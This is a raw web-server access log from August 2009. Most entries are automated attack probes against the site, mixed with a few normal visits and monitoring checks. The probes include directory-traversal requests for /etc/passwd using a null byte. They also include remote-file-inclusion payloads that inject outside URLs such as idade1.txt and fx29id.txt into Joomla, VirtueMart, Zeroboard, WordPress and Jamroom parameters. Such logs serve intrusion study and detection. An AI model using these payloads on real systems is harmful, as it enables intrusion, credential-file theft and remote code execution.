91.121.67.7 - - [03/Aug/2009:03:01:11 -0400] "GET /.php?dept=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 202 "-" "libwww-perl/5.803"
78.110.50.127 - - [03/Aug/2009:03:01:17 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 225 "-" "libwww-perl/5.814"
78.110.50.127 - - [03/Aug/2009:03:01:18 -0400] "GET //outlogin.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 211 "-" "libwww-perl/5.814"
201.232.54.48 - - [03/Aug/2009:03:01:18 -0400] "GET /logs/access_log.Q109053100/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
78.110.50.127 - - [03/Aug/2009:03:01:18 -0400] "GET //include/write.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 216 "-" "libwww-perl/5.814"
78.110.50.127 - - [03/Aug/2009:03:01:18 -0400] "GET //_head.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
119.152.13.212 - - [03/Aug/2009:03:01:23 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11932A482FC5E700CDD3067+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
119.152.13.212 - - [03/Aug/2009:03:01:25 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11932A482FC5E700CDD3067+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
119.152.13.212 - - [03/Aug/2009:03:01:25 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11932A482FC5E700CDD3067+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
119.152.13.212 - - [03/Aug/2009:03:01:25 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11932A482FC5E700CDD3067+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
119.152.13.212 - - [03/Aug/2009:03:01:25 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11932A482FC5E700CDD3067+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
91.121.67.7 - - [03/Aug/2009:03:01:27 -0400] "GET /logs/access_log.Q109051000/.php?dept=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 229 "-" "libwww-perl/5.803"
91.121.67.7 - - [03/Aug/2009:03:01:28 -0400] "GET /.php?dept=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 202 "-" "libwww-perl/5.803"
91.121.67.7 - - [03/Aug/2009:03:01:28 -0400] "GET /logs/.php?dept=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
209.59.12.99 - - [03/Aug/2009:03:01:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [03/Aug/2009:03:01:32 -0400] "GET /logs/access_log.Q109070800/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:03:01:32 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:03:01:37 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:03:01:40 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:03:02:03 -0400] "GET /logs/access_log.Q109060900////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:02:08 -0400] "GET /logs/access_log.Q109070800%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.221.130.3 - - [03/Aug/2009:03:02:09 -0400] "GET //include/write.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
91.121.83.177 - - [03/Aug/2009:03:02:12 -0400] "GET /logs/error_log.Q109060900////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.67.7 - - [03/Aug/2009:03:02:22 -0400] "GET /logs/access_log.Q109052900/index.php?inhalt=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
91.121.67.7 - - [03/Aug/2009:03:02:22 -0400] "GET /index.php?inhalt=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
91.121.67.7 - - [03/Aug/2009:03:02:23 -0400] "GET /logs/index.php?inhalt=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
220.231.126.252 - - [03/Aug/2009:03:03:03 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
219.117.207.76 - - [03/Aug/2009:03:03:03 -0400] "GET /logs/access_log.Q109051300%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:03:03:06 -0400] "GET /logs/access_log.Q109070600%20%20/?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:03:03:06 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 200 12138 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:03:03:06 -0400] "GET /logs/access_log.Q109051200%20%20/?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.221.130.15 - - [03/Aug/2009:03:03:12 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
77.221.130.15 - - [03/Aug/2009:03:03:12 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
77.221.130.15 - - [03/Aug/2009:03:03:12 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
77.221.130.15 - - [03/Aug/2009:03:03:13 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
77.221.130.15 - - [03/Aug/2009:03:03:13 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
77.221.130.15 - - [03/Aug/2009:03:03:13 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
91.121.67.7 - - [03/Aug/2009:03:03:30 -0400] "GET /logs/error_log.Q109051000/.php?dept=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
91.121.67.7 - - [03/Aug/2009:03:03:42 -0400] "GET /logs/access_log.Q109071700/index.php?inhalt=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
78.110.50.127 - - [03/Aug/2009:03:04:00 -0400] "GET //skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 223 "-" "libwww-perl/5.814"
78.110.50.127 - - [03/Aug/2009:03:04:04 -0400] "GET //skin/zero_vote/login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 223 "-" "libwww-perl/5.814"
213.171.225.234 - - [03/Aug/2009:03:04:13 -0400] "GET /administrator/components/com_virtuemart/errors.php?error=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
78.110.50.127 - - [03/Aug/2009:03:04:15 -0400] "GET //skin/zero_vote/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 223 "-" "libwww-perl/5.814"
77.221.130.3 - - [03/Aug/2009:03:04:15 -0400] "GET //skin/zero_vote/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
216.120.237.150 - - [03/Aug/2009:03:04:18 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
216.120.237.150 - - [03/Aug/2009:03:04:18 -0400] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
216.120.237.150 - - [03/Aug/2009:03:04:18 -0400] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
119.152.31.133 - - [03/Aug/2009:03:04:30 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11932A482FC5E700CDD3067+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
80.73.192.55 - - [03/Aug/2009:03:04:33 -0400] "GET //skin/zero_vote/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 223 "-" "libwww-perl/5.64"
220.231.126.252 - - [03/Aug/2009:03:04:36 -0400] "GET //errors.php?error=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
80.73.192.55 - - [03/Aug/2009:03:04:38 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 225 "-" "libwww-perl/5.64"
220.231.126.252 - - [03/Aug/2009:03:04:39 -0400] "GET /logs//errors.php?error=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:03:04:39 -0400] "GET /logs/access_log.Q109051200//errors.php?error=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.221.130.15 - - [03/Aug/2009:03:04:39 -0400] "GET //skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
220.231.126.252 - - [03/Aug/2009:03:04:48 -0400] "GET /logs/access_log.Q109060900%20%20////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.221.130.3 - - [03/Aug/2009:03:04:50 -0400] "GET //skin/zero_vote/login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
80.73.192.55 - - [03/Aug/2009:03:04:58 -0400] "GET //_head.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 208 "-" "libwww-perl/5.64"
80.73.192.55 - - [03/Aug/2009:03:05:03 -0400] "GET //skin/zero_vote/login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 223 "-" "libwww-perl/5.64"
91.121.83.177 - - [03/Aug/2009:03:05:04 -0400] "GET /logs/access_log.Q109051300%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:03:05:04 -0400] "GET /logs/access_log.Q109050800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:03:05:10 -0400] "GET /logs/access_log.Q109051300%20%20////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:03:05:10 -0400] "GET /logs/access_log.Q109050800%20%20////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.221.130.15 - - [03/Aug/2009:03:05:10 -0400] "GET //skin/zero_vote/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
77.221.130.3 - - [03/Aug/2009:03:05:21 -0400] "GET //skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
77.221.130.15 - - [03/Aug/2009:03:05:22 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
77.221.130.15 - - [03/Aug/2009:03:05:24 -0400] "GET //_head.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
190.144.44.36 - - [03/Aug/2009:03:05:24 -0400] "GET /logs/access_log.Q109053100/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.67.7 - - [03/Aug/2009:03:05:27 -0400] "GET /index.php?inhalt=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
77.221.130.15 - - [03/Aug/2009:03:05:28 -0400] "GET //skin/zero_vote/login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
190.144.44.36 - - [03/Aug/2009:03:05:29 -0400] "GET /logs/access_log.Q109070800/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
80.73.192.55 - - [03/Aug/2009:03:05:30 -0400] "GET //skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 223 "-" "libwww-perl/5.64"
94.23.205.32 - - [03/Aug/2009:03:05:42 -0400] "GET /logs/access_log.Q109061100//?option=com_typedcontent&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
94.23.205.32 - - [03/Aug/2009:03:05:42 -0400] "GET /logs//?option=com_typedcontent&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 12143 "-" "libwww-perl/5.803"
94.23.205.32 - - [03/Aug/2009:03:05:42 -0400] "GET //?option=com_typedcontent&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
94.23.205.32 - - [03/Aug/2009:03:05:43 -0400] "GET /logs/access_log.Q109051300//?option=com_typedcontent&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
77.221.130.15 - - [03/Aug/2009:03:06:08 -0400] "GET //outlogin.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
91.121.83.177 - - [03/Aug/2009:03:06:23 -0400] "GET /logs/access_log.Q109060900////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:03:06:33 -0400] "GET /logs/error_log.Q109060900////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:03:06:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.73.192.55 - - [03/Aug/2009:03:06:39 -0400] "GET //include/write.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 216 "-" "libwww-perl/5.64"
91.121.83.177 - - [03/Aug/2009:03:06:39 -0400] "GET /errors.php?error=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:03:06:39 -0400] "GET /logs/errors.php?error=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:03:06:39 -0400] "GET /logs/access_log.Q109051200/errors.php?error=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:03:06:43 -0400] "GET /logs/access_log.Q109050800/errors.php?error=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:03:06:53 -0400] "GET /logs/error_log.Q109061000////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.73.192.55 - - [03/Aug/2009:03:07:12 -0400] "GET //outlogin.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 211 "-" "libwww-perl/5.64"
77.221.130.15 - - [03/Aug/2009:03:07:17 -0400] "GET /logs/access_log.Q109061200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
77.221.130.15 - - [03/Aug/2009:03:07:19 -0400] "GET /logs/access_log.Q109061200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
216.120.237.150 - - [03/Aug/2009:03:07:27 -0400] "GET /logs/access_log.Q109070800//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
77.221.130.15 - - [03/Aug/2009:03:07:42 -0400] "GET //?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
213.149.105.8 - - [03/Aug/2009:03:07:45 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:03:07:45 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:03:07:45 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:03:08:00 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:03:08:04 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:03:08:04 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 200 12138 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:03:08:04 -0400] "GET /logs/access_log.Q109070600%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:03:08:05 -0400] "GET /logs/access_log.Q109051200%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:03:08:17 -0400] "GET /logs/error_log.Q109060900%20%20////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
203.78.110.131 - - [03/Aug/2009:03:08:18 -0400] "GET /logs/access_log.Q109071500//ladder/?dir[func]=&dir[base]=tepos.co.nr? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
201.232.54.48 - - [03/Aug/2009:03:08:24 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:03:08:33 -0400] "GET /logs/access_log.Q109071500//bbs///skin/ggambo7002_board/comment_modify.php?dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:03:08:37 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:03:08:37 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:03:08:37 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:09:09 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:09:09 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:09:09 -0400] "GET /logs/access_log.Q109061200%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:09:09 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
77.221.130.15 - - [03/Aug/2009:03:09:14 -0400] "GET //include/write.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
80.73.192.55 - - [03/Aug/2009:03:09:17 -0400] "GET //?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 200 452 "-" "libwww-perl/5.64"
190.144.44.36 - - [03/Aug/2009:03:09:25 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:09:25 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:09:25 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:03:09:29 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
119.152.31.133 - - [03/Aug/2009:03:09:34 -0400] "GET /CGI-BIN/favicon.ico HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows 6.0; MSIE 7.0.6001.18000)"
213.149.105.8 - - [03/Aug/2009:03:09:38 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:03:09:49 -0400] "GET /logs/access_log.Q109061900%20%20////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:10:20 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
